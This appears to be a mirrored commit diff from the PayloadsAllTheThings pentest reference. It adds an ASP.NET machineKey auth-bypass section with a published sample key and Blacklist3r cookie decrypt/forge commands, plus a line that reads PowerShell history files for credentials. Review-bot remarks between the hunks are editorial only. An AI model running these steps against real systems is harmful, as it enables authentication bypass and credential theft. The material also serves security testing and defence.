mirror of
https://github.com/swisskyrepo/PayloadsAllTheThings.git
synced 2024-12-18 18:36:10 +00:00
Blacklist3r and Machine Key
This commit is contained in:
parent
97015e4f64
commit
b052f78d95
@ -15,6 +15,8 @@
|
|||||||
- [Twitter API Secret](#twitter-api-secret)
|
- [Twitter API Secret](#twitter-api-secret)
|
||||||
- [Twitter Bearer Token](#twitter-bearer-token)
|
- [Twitter Bearer Token](#twitter-bearer-token)
|
||||||
- [Gitlab Personal Access Token](#gitlab-personal-access-token)
|
- [Gitlab Personal Access Token](#gitlab-personal-access-token)
|
||||||
|
- [Auth Bypass using pre-published Machine Key](#auth-bypass-using-pre-published-machine-key)
|
||||||
|
|
||||||
|
|
||||||
## Tools
|
## Tools
|
||||||
|
|
||||||
@ -87,7 +89,31 @@ curl "https://gitlab.example.com/api/v4/projects?private_token=<your_access_toke
|
|||||||
```
|
```
|
||||||
|
|
||||||
|
|
||||||
|
### Auth Bypass using pre-published Machine Key
|
||||||
|
|
||||||
|
> By default, ASP.NET creates a Forms Authentication Ticket with unique a username associated with it, Date and Time at which the ticket was issued and expires. So, all you need is just a unique username and a machine key to create a forms authentication token
|
||||||
|
|
||||||
|
That machine key is used for encryption and decryption of forms authentication cookie data and view-state data, and for verification of out-of-process session state identification.
|
||||||
|
|
||||||
|
Example of a machineKey from https://docs.microsoft.com/en-us/iis/troubleshoot/security-issues/troubleshooting-forms-authentication.
|
||||||
|
|
||||||
|
```xml
|
||||||
|
<machineKey validationKey="87AC8F432C8DB844A4EFD024301AC1AB5808BEE9D1870689B63794D33EE3B55CDB315BB480721A107187561F388C6BEF5B623BF31E2E725FC3F3F71A32BA5DFC" decryptionKey="E001A307CCC8B1ADEA2C55B1246CDCFE8579576997FF92E7" validation="SHA1" />
|
||||||
|
```
|
||||||
|
|
||||||
|
Exploit with [Blacklist3r](https://github.com/NotSoSecure/Blacklist3r)
|
||||||
|
|
||||||
|
```powershell
|
||||||
|
# decrypt cookie
|
||||||
|
$ AspDotNetWrapper.exe --keypath C:\MachineKey.txt --cookie XXXXXXX_XXXXX-XXXXX --decrypt --purpose=owin.cookie --valalgo=hmacsha512 --decalgo=aes
|
||||||
|
|
||||||
|
# encrypt cookie (edit Decrypted.txt)
|
||||||
|
$ AspDotNetWrapper.exe --decryptDataFilePath C:\DecryptedText.txt
|
||||||
|
```
|
||||||
|
|
||||||
|
|
||||||
## References
|
## References
|
||||||
|
|
||||||
* [Finding Hidden API Keys & How to use them - Sumit Jain - August 24, 2019](https://medium.com/@sumitcfe/finding-hidden-api-keys-how-to-use-them-11b1e5d0f01d)
|
* [Finding Hidden API Keys & How to use them - Sumit Jain - August 24, 2019](https://medium.com/@sumitcfe/finding-hidden-api-keys-how-to-use-them-11b1e5d0f01d)
|
||||||
* [Private API key leakage due to lack of access control - yox - August 8, 2018](https://hackerone.com/reports/376060)
|
* [Private API key leakage due to lack of access control - yox - August 8, 2018](https://hackerone.com/reports/376060)
|
||||||
|
* [Project Blacklist3r - November 23, 2018 - @notsosecure](https://www.notsosecure.com/project-blacklist3r/)
|
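Review bot: the second command's comment and its argument disagree: the comment says "edit Decrypted.txt" while the flag passes `C:\DecryptedText.txt`; use one file name in both places. In the same block, the `$ ` prompts sit inside a `powershell` fence, which makes the lines un-pasteable (`$` starts a variable in PowerShell); drop the prompt or change the fence to match the other tool examples in the file. Two smaller points: the decrypt example uses `--purpose=owin.cookie`, i.e. an OWIN cookie-authentication cookie, while the quoted paragraph above it describes the classic Forms Authentication ticket, so a one-line note on which cookie type the example covers (and what `--keypath C:\MachineKey.txt` is expected to contain) would save readers a false start; and since the section's whole point is that the `<machineKey>` copied from the Microsoft docs is a published key, a closing remediation sentence (generate a unique machineKey per application and rotate any key that was copied from documentation or a template) would round the section off. The quoted sentence "with unique a username" is verbatim from the cited source and can stay as-is.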
@ -44,7 +44,7 @@
|
|||||||
- [Drop the MIC](#drop-the-mic)
|
- [Drop the MIC](#drop-the-mic)
|
||||||
- [Ghost Potato - CVE-2019-1384](#ghost-potato---cve-2019-1384)
|
- [Ghost Potato - CVE-2019-1384](#ghost-potato---cve-2019-1384)
|
||||||
- [Dangerous Built-in Groups Usage](#dangerous-built-in-groups-usage)
|
- [Dangerous Built-in Groups Usage](#dangerous-built-in-groups-usage)
|
||||||
- [Abusing Active Directory ACLs/ACEs](#abusing-active-directory-acls-aces)
|
- [Abusing Active Directory ACLs/ACEs](#abusing-active-directory-aclsaces)
|
||||||
- [Trust relationship between domains](#trust-relationship-between-domains)
|
- [Trust relationship between domains](#trust-relationship-between-domains)
|
||||||
- [Child Domain to Forest Compromise - SID Hijacking](#child-domain-to-forest-compromise---sid-hijacking)
|
- [Child Domain to Forest Compromise - SID Hijacking](#child-domain-to-forest-compromise---sid-hijacking)
|
||||||
- [Unconstrained delegation](#unconstrained-delegation)
|
- [Unconstrained delegation](#unconstrained-delegation)
|
||||||
|
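Review bot: the anchor change to `#abusing-active-directory-aclsaces` is the correct fix for GitHub's heading slugs, which drop punctuation such as `/` rather than replacing it with a hyphen; it is consistent with the surrounding entries, where ` - ` in a heading becomes `---` (as in `#ghost-potato---cve-2019-1384`). Nothing further needed here.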
@ -394,6 +394,7 @@ Invoke-SessionGopher -AllDomain -u domain.com\adm-arvanaghi -p s3cr3tP@ss
|
|||||||
|
|
||||||
```powershell
|
```powershell
|
||||||
type C:\Users\swissky\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt
|
type C:\Users\swissky\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt
|
||||||
|
type $env:APPDATA\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt
|
||||||
cat (Get-PSReadlineOption).HistorySavePath
|
cat (Get-PSReadlineOption).HistorySavePath
|
||||||
cat (Get-PSReadlineOption).HistorySavePath | sls passw
|
cat (Get-PSReadlineOption).HistorySavePath | sls passw
|
||||||
```
|
```
|
||||||
|
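Review bot: the added `type $env:APPDATA\...\ConsoleHost_history.txt` line is a portable version of the line directly above it (`C:\Users\swissky\...`), so it should replace that hard-coded path rather than be listed next to it; and `(Get-PSReadlineOption).HistorySavePath` two lines below already resolves the real history file location, which makes both literal paths redundant. If the intent is to show the default location for readers without PSReadLine loaded, say so in a comment. Mixing `type` and `cat` in one block is harmless (both alias `Get-Content`) but one verb reads cleaner.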